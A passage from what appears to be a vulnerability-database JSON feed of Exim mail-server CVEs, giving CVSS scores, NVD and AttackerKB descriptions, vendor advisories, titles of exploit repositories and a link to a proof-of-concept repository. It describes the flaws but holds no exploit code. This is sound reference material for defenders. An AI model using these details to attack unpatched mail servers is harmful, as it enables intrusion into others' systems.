"scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2020-28024", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28024"], "modified": "2022-06-28T14:11:00", "cpe": [], "id": "CVE-2020-28024", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28024", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-06T14:43:49", "description": "Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the log directory (owned by a non-root user), a symlink or hard link attack allows overwriting critical root-owned files anywhere on the filesystem.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2020-28007", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28007"], "modified": "2021-05-10T20:17:00", "cpe": [], "id": "CVE-2020-28007", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28007", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-06-06T14:43:51", "description": "Exim 4 before 4.94.2 allows Out-of-bounds Read. smtp_setup_msg may disclose sensitive information from process memory to an unauthenticated SMTP client.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2020-28023", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28023"], "modified": "2021-05-10T16:15:00", "cpe": [], "id": "CVE-2020-28023", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28023", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-06-06T14:43:52", "description": "Exim 4 before 4.94.2 allows Out-of-bounds Read because pdkim_finish_bodyhash does not validate the relationship between sig->bodyhash.len and b->bh.len; thus, a crafted DKIM-Signature header might lead to a leak of sensitive information from process memory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2020-28025", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28025"], "modified": "2021-05-10T16:11:00", "cpe": [], "id": "CVE-2020-28025", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28025", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-06-06T14:43:54", "description": "Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow in receive_add_recipient via an e-mail message with fifty million recipients. NOTE: remote exploitation may be difficult because of resource consumption.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2020-28017", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28017"], "modified": "2022-10-04T15:02:00", "cpe": [], "id": "CVE-2020-28017", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28017", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-06T14:43:53", "description": "Exim 4 before 4.94.2 has Improper Restriction of Write Operations within the Bounds of a Memory Buffer. This occurs when processing name=value pairs within MAIL FROM and RCPT TO commands.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2020-28022", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28022"], "modified": "2022-06-28T14:11:00", "cpe": [], "id": "CVE-2020-28022", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28022", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-06T14:43:49", "description": "Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters. Local users can alter the behavior of root processes because a recipient address can have a newline character.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2020-28015", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28015"], "modified": "2021-05-10T18:08:00", "cpe": [], "id": "CVE-2020-28015", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28015", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-06-06T14:43:51", "description": "Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters. An authenticated remote SMTP client can insert newline characters into a spool file (which indirectly leads to remote code execution as root) via AUTH= in a MAIL FROM command.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2020-28021", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28021"], "modified": "2021-05-10T16:23:00", "cpe": [], "id": "CVE-2020-28021", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28021", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-05-27T14:33:11", "description": "Exim 4 before 4.94.2 has Execution with Unnecessary Privileges. By leveraging a delete_pid_file race condition, a local user can delete arbitrary files as root. This involves the -oP and -oPX options.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.3, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2021-27216", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.3, "vectorString": "AV:L/AC:M/Au:N/C:N/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27216"], "modified": "2022-06-28T14:11:00", "cpe": [], "id": "CVE-2021-27216", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27216", "cvss": {"score": 6.3, "vector": "AV:L/AC:M/Au:N/C:N/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-06-13T14:24:16", "description": "A flaw was found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-05T14:29:00", "type": "cve", "title": "CVE-2019-10149", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2022-11-07T19:12:00", "cpe": ["cpe:/a:exim:exim:4.91", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:18.10"], "id": "CVE-2019-10149", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-10149", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:exim:exim:4.91:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2023-06-06T15:06:55", "description": "Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters. Local users can alter the behavior of root processes because a recipient address can have a newline character.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T00:00:00", "type": "attackerkb", "title": "CVE-2020-28015", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28015"], "modified": "2021-05-11T00:00:00", "id": "AKB:C9297F4A-1863-4574-885A-36C840DFF834", "href": "https://attackerkb.com/topics/ivY75plubC/cve-2020-28015", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-05T08:33:56", "description": "A flaw was found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-05T00:00:00", "type": "attackerkb", "title": "CVE-2019-10149", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2022-11-08T00:00:00", "id": "AKB:CCDE85CB-574C-401B-9892-9CAFDE0D120B", "href": "https://attackerkb.com/topics/GjH2GsCJaj/cve-2019-10149", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-20T20:13:16", "description": "Exim unauthenticated RCE with reports that it\u2019s been used by [Sandworm since August 2019](<CVE-2019-10149>)\n\n \n**Recent assessments:** \n \n**ericalexanderorg** at May 28, 2020 4:49pm UTC reported:\n\nUntested POC exists\n\n[https://github.com/MNEMO-CERT/PoC\u2014CVE-2019-10149_Exim/blob/master/PoC_CVE-2019-10149.py](<https://github.com/MNEMO-CERT/PoC--CVE-2019-10149_Exim/blob/master/PoC_CVE-2019-10149.py>)\n\n**gwillcox-r7** at November 04, 2020 4:03pm UTC reported:\n\nUntested POC exists\n\n[https://github.com/MNEMO-CERT/PoC\u2014CVE-2019-10149_Exim/blob/master/PoC_CVE-2019-10149.py](<https://github.com/MNEMO-CERT/PoC--CVE-2019-10149_Exim/blob/master/PoC_CVE-2019-10149.py>)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 3\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-05-28T00:00:00", "type": "attackerkb", "title": "CVE-2019-10149", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2020-05-28T00:00:00", "id": "AKB:D6CD45B9-F610-4480-99E7-80A4065DF5FD", "href": "https://attackerkb.com/topics/jDinrhSIJh/cve-2019-10149", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:30:48", "description": "A use after free vulnerability exists in Exim. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-15T00:00:00", "type": "checkpoint_advisories", "title": "Exim Use After Free (CVE-2020-28018)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28018"], "modified": "2022-02-15T00:00:00", "id": "CPAI-2020-3455", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:23:00", "description": "A remote code execution vulnerability exists in Exim Mail Server. A remote attacker can exploit this issue by sending a specially crafted packet to the target server. Successful exploitation could result in execution of arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-06-12T00:00:00", "type": "checkpoint_advisories", "title": "Exim Mail Server Remote Code Execution (CVE-2019-10149)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-10-30T00:00:00", "id": "CPAI-2019-0743", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-08-17T10:21:57", "description": "# POC CVE-2020-28018\n\n## Introducci\u00f3n\n\nEl equipo de Qualys ha de...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-18T17:22:45", "type": "githubexploit", "title": "Exploit for Use After Free in Exim", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28018"], "modified": "2021-10-13T22:59:51", "id": "347B3764-E644-581E-AFCB-F57D6EDDDA1E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T05:54:32", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-15T15:09:05", "type": "githubexploit", "title": "Exploit for Use After Free in Exim", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28018"], "modified": "2021-08-24T07:35:12", "id": "D4A90249-DD8A-53F0-BF5C-2A24402535BB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:21:18", "description": "# CVE-2019-10149 - Exim 4.87 < 4.91\nInstructions for installing ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-21T08:13:27", "type": "githubexploit", "title": "Exploit for OS Command Injection in Exim", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": 